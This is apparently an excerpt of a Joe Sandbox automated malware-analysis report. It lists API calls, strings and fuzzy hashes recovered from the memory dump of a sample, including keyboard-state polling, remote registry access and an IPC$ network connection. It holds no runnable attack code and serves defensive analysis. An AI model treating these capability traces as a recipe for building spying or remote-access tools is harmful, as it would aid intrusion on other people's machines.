                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                          • API String ID: 3125838495-3381328864
                                                                                          • Opcode ID: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                                          • Instruction ID: 9ea7b4bfd8e333fc3d4c3d1cc69785ca983c3453aa66f955cff8de8c622a02b1
                                                                                          • Opcode Fuzzy Hash: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                                          • Instruction Fuzzy Hash: F011E9B1B40301BBFF10B6659C46EAF739CDF94759F00081BFD44E6182F6ACA9458769
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CopyVariant$ErrorLast
                                                                                          • String ID: Conversion of parameters failed$NULL Pointer assignment$Not an Object type
                                                                                          • API String ID: 2286883814-4206948668
                                                                                          • Opcode ID: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                                          • Instruction ID: 5c76bcf0434180a49ef26f8382d3619d889c8a8ee3f63882ad125ac36acecb62
                                                                                          • Opcode Fuzzy Hash: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                                          • Instruction Fuzzy Hash: 4EA1F0B1644300ABD620EB25CC81EABB3E9FBC4704F10891EF65987251D779E945CBAA
                                                                                          APIs
                                                                                            • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                            • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                          • GetDriveTypeW.KERNEL32(?,?,00000061), ref: 00475EEC
                                                                                          • _wcscpy.LIBCMT ref: 00475F18
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                                          • String ID: a$all$cdrom$fixed$network$ramdisk$removable$unknown$HH
                                                                                          • API String ID: 3052893215-4176887700
                                                                                          • Opcode ID: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                                          • Instruction ID: 30c0e749cffa51fc832ec364bb88d57898ea161693411a08ebb212f54f1b1ce2
                                                                                          • Opcode Fuzzy Hash: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                                          • Instruction Fuzzy Hash: E951E5716047009BC710EF51D981B9BB3D4AB85705F108C2FF948AB382D7B9DE09879B
                                                                                          APIs
                                                                                          • StringFromIID.OLE32(?,?,00000003,?,?,00000000), ref: 004582E5
                                                                                            • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                            • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                          • CoTaskMemFree.OLE32(?,00000000), ref: 00458335
                                                                                          • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 00458351
                                                                                          • RegQueryValueExW.ADVAPI32 ref: 00458381
                                                                                          • CLSIDFromString.OLE32(00000000,?), ref: 004583AF
                                                                                          • RegQueryValueExW.ADVAPI32 ref: 004583E8
                                                                                          • LoadRegTypeLib.OLEAUT32(?,?), ref: 00458486
                                                                                            • Part of subcall function 00413F97: __wtof_l.LIBCMT ref: 00413FA1
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 004584BA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: FromQueryStringValue_wcslen$CloseFreeLoadOpenTaskType__wtof_l_wcscpy
                                                                                          • String ID: Version$\TypeLib$interface\
                                                                                          • API String ID: 656856066-939221531
                                                                                          • Opcode ID: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                                          • Instruction ID: 73379605cfaaf105ee685c6daddaf2c4824f5dc828714578f474d0d05c7db838
                                                                                          • Opcode Fuzzy Hash: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                                          • Instruction Fuzzy Hash: 19513B715083059BD310EF55D944A6FB3E8FFC8B08F004A2DF985A7251EA78DD09CB9A
                                                                                          APIs
                                                                                          • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E676
                                                                                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                          • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E69A
                                                                                          • __swprintf.LIBCMT ref: 0045E6EE
                                                                                          • _printf.LIBCMT ref: 0045E7A9
                                                                                          • _printf.LIBCMT ref: 0045E7D2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: LoadString_printf$__swprintf_wcslen
                                                                                          • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                          • API String ID: 3590180749-2354261254
                                                                                          • Opcode ID: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                                          • Instruction ID: 835382aeb01427732dc6b750cf2ba574ed77461063debdd42288bdc21f9728b4
                                                                                          • Opcode Fuzzy Hash: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                                          • Instruction Fuzzy Hash: B051D5715143019BD324FB51CC41EAF77A8AF84354F14093FF94563292DB78AE49CB6A
                                                                                          APIs
                                                                                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                          • _memset.LIBCMT ref: 00458194
                                                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
                                                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000), ref: 00458219
                                                                                          • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?), ref: 00458248
                                                                                          • CLSIDFromString.OLE32(00000000,?), ref: 00458279
                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0045828F
                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00458296
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset_wcslen
                                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                          • API String ID: 2255324689-22481851
                                                                                          • Opcode ID: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                          • Instruction ID: 0916ae95de1959dc40878de41837780f7e862baf069d4d5c3429810960799c2e
                                                                                          • Opcode Fuzzy Hash: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                          • Instruction Fuzzy Hash: 4A4190725083019BD320EF54C845B5FB7E8AF84714F044D2EFA8577291DBB8E949CB9A
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(80000000,interface,00000000,00020019,?), ref: 00458513
                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00458538
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00458615
                                                                                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                          • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,000001FE,interface\), ref: 0045858A
                                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000028), ref: 004585A8
                                                                                          • __wcsicoll.LIBCMT ref: 004585D6
                                                                                          • IIDFromString.OLE32(?,?,?,?), ref: 004585EB
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 004585F8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseOpen$EnumFromQueryStringValue__wcsicoll_wcslen
                                                                                          • String ID: ($interface$interface\
                                                                                          • API String ID: 2231185022-3327702407
                                                                                          • Opcode ID: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                                          • Instruction ID: 2ed788c9a442d2de66cb2a0eaf665167c450c6ff9570aaff4df7cfaf3afbbce1
                                                                                          • Opcode Fuzzy Hash: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                                          • Instruction Fuzzy Hash: CE317271204305ABE710DF54DD85F6BB3E8FB84744F10492DF685A6191EAB8E908C76A
                                                                                          APIs
                                                                                          • WSAStartup.WSOCK32(00000101,?), ref: 004365A5
                                                                                          • gethostname.WSOCK32(00000100,00000100,00000101,?), ref: 004365BC
                                                                                          • gethostbyname.WSOCK32(00000101,00000100,00000100,00000101,?), ref: 004365C6
                                                                                          • _wcscpy.LIBCMT ref: 004365F5
                                                                                          • WSACleanup.WSOCK32 ref: 004365FD
                                                                                          • inet_ntoa.WSOCK32(00000100,?), ref: 00436624
                                                                                          • _strcat.LIBCMT ref: 0043662F
                                                                                          • _wcscpy.LIBCMT ref: 00436644
                                                                                          • WSACleanup.WSOCK32(?,?,?,?,?,?,00000100,?), ref: 00436652
                                                                                          • _wcscpy.LIBCMT ref: 00436666
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcscpy$Cleanup$Startup_strcatgethostbynamegethostnameinet_ntoa
                                                                                          • String ID: 0.0.0.0
                                                                                          • API String ID: 2691793716-3771769585
                                                                                          • Opcode ID: 65646d0c3f70c30576c3209c49215e1e6413ca059fa52035c9da78ad10046a0d
                                                                                          • Instruction ID: 29d249c793a1599df1911ffab6ed89036a29d54f41df1114d8fa63e2d2305339
                                                                                          • Opcode Fuzzy Hash: 65646d0c3f70c30576c3209c49215e1e6413ca059fa52035c9da78ad10046a0d
                                                                                          • Instruction Fuzzy Hash: 5C21D4726003016BD620FB269C42FFF33A89FD4318F54492FF64456242EABDD58983AB
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048C968,0000000C,00416C4D,00000000,00000000,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B24
                                                                                          • __crt_waiting_on_module_handle.LIBCMT ref: 00416B2F
                                                                                            • Part of subcall function 0041177F: Sleep.KERNEL32(000003E8,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 0041178B
                                                                                            • Part of subcall function 0041177F: GetModuleHandleW.KERNEL32(00411739,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00411794
                                                                                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00416B58
                                                                                          • GetProcAddress.KERNEL32(00411739,DecodePointer), ref: 00416B68
                                                                                          • __lock.LIBCMT ref: 00416B8A
                                                                                          • InterlockedIncrement.KERNEL32(00EA60FF), ref: 00416B97
                                                                                          • __lock.LIBCMT ref: 00416BAB
                                                                                          • ___addlocaleref.LIBCMT ref: 00416BC9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                          • API String ID: 1028249917-2843748187
                                                                                          • Opcode ID: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                                          • Instruction ID: dfb830706c011728ae11a8c0f52cb2fa371409e71f4acd403326aacb15a29bdd
                                                                                          • Opcode Fuzzy Hash: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                                          • Instruction Fuzzy Hash: 4E119671944701AFD720EF76C905B9EBBE0AF00714F10495FE469A6391DB78A580CB1D
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,00000000,000000FF,?), ref: 0044931D
                                                                                          • SendMessageW.USER32(?,0045BBB0,00000000,00000000), ref: 0044932D
                                                                                          • CharNextW.USER32(?,?,?,?,0045BBB0,00000000,00000000,?,?), ref: 00449361
                                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449375
                                                                                          • SendMessageW.USER32(?,00000402,?), ref: 0044941C
                                                                                          • SendMessageW.USER32(004A83D8,000000C2,00000001,?), ref: 004494A0
                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449515
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$CharNext
                                                                                          • String ID:
                                                                                          • API String ID: 1350042424-0
                                                                                          • Opcode ID: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                                          • Instruction ID: cf19a455924c4199ae2d31ef2e344bdd2865620a2145bd440d1f5c61272ee54d
                                                                                          • Opcode Fuzzy Hash: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                                          • Instruction Fuzzy Hash: 5D81B5312083019BE720DF15DC85FBBB7E4EBD9B20F00492EFA54962C0D7B99946D766
                                                                                          APIs
                                                                                          • GetKeyboardState.USER32(?,?,00000000), ref: 00453C0D
                                                                                          • SetKeyboardState.USER32(?), ref: 00453C5A
                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00453C82
                                                                                          • GetKeyState.USER32(000000A0), ref: 00453C99
                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00453CC9
                                                                                          • GetKeyState.USER32(000000A1), ref: 00453CDA
                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 00453D07
                                                                                          • GetKeyState.USER32(00000011), ref: 00453D15
                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 00453D3F
                                                                                          • GetKeyState.USER32(00000012), ref: 00453D4D
                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00453D77
                                                                                          • GetKeyState.USER32(0000005B), ref: 00453D85
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: State$Async$Keyboard
                                                                                          • String ID:
                                                                                          • API String ID: 541375521-0
                                                                                          • Opcode ID: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                                          • Instruction ID: 09d2c23b2f41f951af40c960ff4fa7a39ed3d74d48f5bb091813d5d41b5bf946
                                                                                          • Opcode Fuzzy Hash: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                                          • Instruction Fuzzy Hash: BD5108311497C42AF731EF6048217A7BBE45F52782F488D5EE9C107283E619AB0C976B
                                                                                          APIs
                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00437DD7
                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00437DE9
                                                                                          • MoveWindow.USER32(00000000,0000000A,?,?,?,00000000), ref: 00437E5C
                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00437E70
                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00437E82
                                                                                          • MoveWindow.USER32(00000000,?,00000000,?,?,00000000), ref: 00437EDB
                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00437EEA
                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00437EFC
                                                                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00437F46
                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00437F55
                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 00437F6E
                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00437F78
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                                          • String ID:
                                                                                          • API String ID: 3096461208-0
                                                                                          • Opcode ID: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                                          • Instruction ID: 6334a21bf5495bf578199e0a0c43900503e40640961724061e29feeedb49a886
                                                                                          • Opcode Fuzzy Hash: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                                          • Instruction Fuzzy Hash: 46511CB16083069FC318DF68DD85A2BB7E9ABC8300F144A2DF985D3391E6B4ED058B95
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                          • String ID:
                                                                                          • API String ID: 136442275-0
                                                                                          • Opcode ID: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                                          • Instruction ID: e47e2093bf76b35e8f1fec89578fc46911e8a4506192668d3a16ce6d5165f020
                                                                                          • Opcode Fuzzy Hash: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                                          • Instruction Fuzzy Hash: 744124B2408345ABC235E754C885EEF73ECABD8314F44891EB68D42141EB796688C7A7
                                                                                          APIs
                                                                                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B479
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConnectRegistry_wcslen
                                                                                          • String ID: HH
                                                                                          • API String ID: 535477410-2761332787
                                                                                          • Opcode ID: cc03a81e182be6ba1e7ee8022fe76587c4fcfc5607386b983ff95d826003d501
                                                                                          • Instruction ID: 7a368be733395892e28f24b11b3b05e85d853a2cd395d98498a1c99032eed9d9
                                                                                          • Opcode Fuzzy Hash: cc03a81e182be6ba1e7ee8022fe76587c4fcfc5607386b983ff95d826003d501
                                                                                          • Instruction Fuzzy Hash: 63E171B1604200ABC714EF28C981F1BB7E4EF88704F148A1EF685DB381D779E945CB9A
                                                                                          APIs
                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 004604B5
                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 004604F1
                                                                                          • _wcslen.LIBCMT ref: 00460502
                                                                                          • CharUpperBuffW.USER32(?,00000000), ref: 00460510
                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00460589
                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 004605C2
                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00460606
                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 0046063E
                                                                                          • GetWindowRect.USER32(?,?), ref: 004606AD
                                                                                          Strings
